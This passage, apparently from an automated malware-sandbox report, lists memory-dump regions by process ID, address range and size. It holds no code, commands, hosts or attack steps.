                                                                                                  464KB

                                                                                                • memory/2808-304-0x0000015A769A0000-0x0000015A76A14000-memory.dmp
                                                                                                  Filesize

                                                                                                  464KB

                                                                                                • memory/2844-404-0x0000000000000000-mapping.dmp
                                                                                                • memory/2844-458-0x00000000031B4000-0x00000000031B5000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2844-412-0x00000000031B0000-0x00000000031B2000-memory.dmp
                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/3040-388-0x0000000003450000-0x0000000003465000-memory.dmp
                                                                                                  Filesize

                                                                                                  84KB

                                                                                                • memory/3052-154-0x0000000000000000-mapping.dmp
                                                                                                • memory/3052-353-0x0000000003EC0000-0x0000000003F93000-memory.dmp
                                                                                                  Filesize

                                                                                                  844KB

                                                                                                • memory/3052-322-0x0000000000400000-0x00000000021BE000-memory.dmp
                                                                                                  Filesize

                                                                                                  29.7MB

                                                                                                • memory/3176-266-0x0000000000000000-mapping.dmp
                                                                                                • memory/3628-136-0x0000000000000000-mapping.dmp
                                                                                                • memory/3920-222-0x0000000000DA0000-0x0000000000DA1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3920-238-0x00000000014D0000-0x00000000014E7000-memory.dmp
                                                                                                  Filesize

                                                                                                  92KB

                                                                                                • memory/3920-254-0x000000001B9D0000-0x000000001B9D2000-memory.dmp
                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/3920-210-0x0000000000000000-mapping.dmp
                                                                                                • memory/3944-148-0x0000000000000000-mapping.dmp
                                                                                                • memory/4112-244-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4112-208-0x0000000000000000-mapping.dmp
                                                                                                • memory/4112-255-0x0000000002890000-0x0000000002891000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4112-230-0x0000000001040000-0x0000000001041000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4112-240-0x00000000098C0000-0x00000000098C1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4112-219-0x0000000000650000-0x0000000000651000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4112-236-0x0000000001050000-0x000000000105C000-memory.dmp
                                                                                                  Filesize

                                                                                                  48KB

                                                                                                • memory/4124-332-0x00000173E1800000-0x00000173E184D000-memory.dmp
                                                                                                  Filesize

                                                                                                  308KB

                                                                                                • memory/4124-294-0x00000173E18C0000-0x00000173E1934000-memory.dmp
                                                                                                  Filesize

                                                                                                  464KB

                                                                                                • memory/4244-312-0x0000000000000000-mapping.dmp
                                                                                                • memory/4244-193-0x0000000000000000-mapping.dmp
                                                                                                • memory/4244-196-0x0000000000360000-0x0000000000361000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4244-328-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4264-694-0x0000000000000000-mapping.dmp
                                                                                                • memory/4276-301-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                  Filesize

                                                                                                  80KB

                                                                                                • memory/4276-292-0x0000000000000000-mapping.dmp
                                                                                                • memory/4284-139-0x0000000000000000-mapping.dmp
                                                                                                • memory/4304-198-0x0000000000000000-mapping.dmp
                                                                                                • memory/4304-206-0x0000000002830000-0x0000000002832000-memory.dmp
                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/4456-245-0x0000000000000000-mapping.dmp
                                                                                                • memory/4456-256-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                  Filesize

                                                                                                  80KB

                                                                                                • memory/4456-115-0x0000000000000000-mapping.dmp
                                                                                                • memory/4556-140-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                  Filesize

                                                                                                  100KB

                                                                                                • memory/4556-143-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                  Filesize

                                                                                                  100KB

                                                                                                • memory/4556-137-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                  Filesize

                                                                                                  100KB

                                                                                                • memory/4556-118-0x0000000000000000-mapping.dmp
                                                                                                • memory/4556-132-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                  Filesize

                                                                                                  572KB

                                                                                                • memory/4556-133-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                  Filesize

                                                                                                  1.5MB

                                                                                                • memory/4556-146-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                  Filesize

                                                                                                  100KB

                                                                                                • memory/4556-134-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                  Filesize

                                                                                                  152KB

                                                                                                • memory/4604-279-0x0000000008160000-0x0000000008161000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4604-334-0x0000000005840000-0x0000000005841000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4604-246-0x0000000000FF0000-0x0000000000FF1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4604-291-0x00000000081C0000-0x00000000081C1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4604-250-0x00000000057D0000-0x00000000057FE000-memory.dmp
                                                                                                  Filesize

                                                                                                  184KB

                                                                                                • memory/4604-216-0x0000000000000000-mapping.dmp
                                                                                                • memory/4604-285-0x0000000008420000-0x0000000008421000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4604-278-0x0000000008920000-0x0000000008921000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4616-202-0x0000000000000000-mapping.dmp
                                                                                                • memory/4616-229-0x0000000000A50000-0x0000000000A8E000-memory.dmp
                                                                                                  Filesize

                                                                                                  248KB

                                                                                                • memory/4616-253-0x000000001AE90000-0x000000001AE92000-memory.dmp
                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/4616-209-0x0000000000300000-0x0000000000301000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4744-204-0x0000000000000000-mapping.dmp
                                                                                                • memory/4768-463-0x0000000000000000-mapping.dmp
                                                                                                • memory/4776-336-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4776-268-0x0000000000000000-mapping.dmp
                                                                                                • memory/4804-145-0x0000000000000000-mapping.dmp
                                                                                                • memory/4832-267-0x0000000000000000-mapping.dmp
                                                                                                • memory/4832-340-0x0000000077040000-0x00000000771CE000-memory.dmp
                                                                                                  Filesize

                                                                                                  1.6MB

                                                                                                • memory/4832-384-0x00000000030A0000-0x00000000030A1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4936-135-0x0000000000000000-mapping.dmp
                                                                                                • memory/4948-142-0x0000000000000000-mapping.dmp
                                                                                                • memory/5144-329-0x0000000000000000-mapping.dmp
                                                                                                • memory/5144-377-0x00000000030C0000-0x00000000030C2000-memory.dmp
                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/5312-339-0x0000000000000000-mapping.dmp
                                                                                                • memory/5312-419-0x0000000005770000-0x0000000005771000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/5420-454-0x0000000000F40000-0x0000000000F41000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/5420-350-0x0000000000000000-mapping.dmp
                                                                                                • memory/5696-368-0x0000000000000000-mapping.dmp
                                                                                                • memory/5708-425-0x0000000005500000-0x0000000005501000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/5708-369-0x0000000000000000-mapping.dmp
                                                                                                • memory/5948-408-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                  Filesize

                                                                                                  88KB

                                                                                                • memory/5948-389-0x0000000000000000-mapping.dmp
                                                                                                • memory/6072-399-0x0000000000000000-mapping.dmp
                                                                                                • memory/6072-428-0x0000000002690000-0x0000000002692000-memory.dmp
                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/6312-554-0x0000000000000000-mapping.dmp
                                                                                                • memory/6456-637-0x0000000000000000-mapping.dmp
                                                                                                • memory/6532-558-0x0000000000000000-mapping.dmp
                                                                                                • memory/6876-623-0x0000000000000000-mapping.dmp
                                                                                                • memory/6900-624-0x0000000000000000-mapping.dmp
                                                                                                • memory/7024-689-0x0000000000000000-mapping.dmp
                                                                                                • memory/7024-765-0x0000000000000000-mapping.dmp
                                                                                                • memory/7076-587-0x0000000000000000-mapping.dmp
                                                                                                • memory/7080-734-0x0000000000000000-mapping.dmp
                                                                                                • memory/7128-759-0x0000000000000000-mapping.dmp
                                                                                                • memory/7140-727-0x0000000000000000-mapping.dmp
                                                                                                • memory/7940-789-0x0000000000000000-mapping.dmp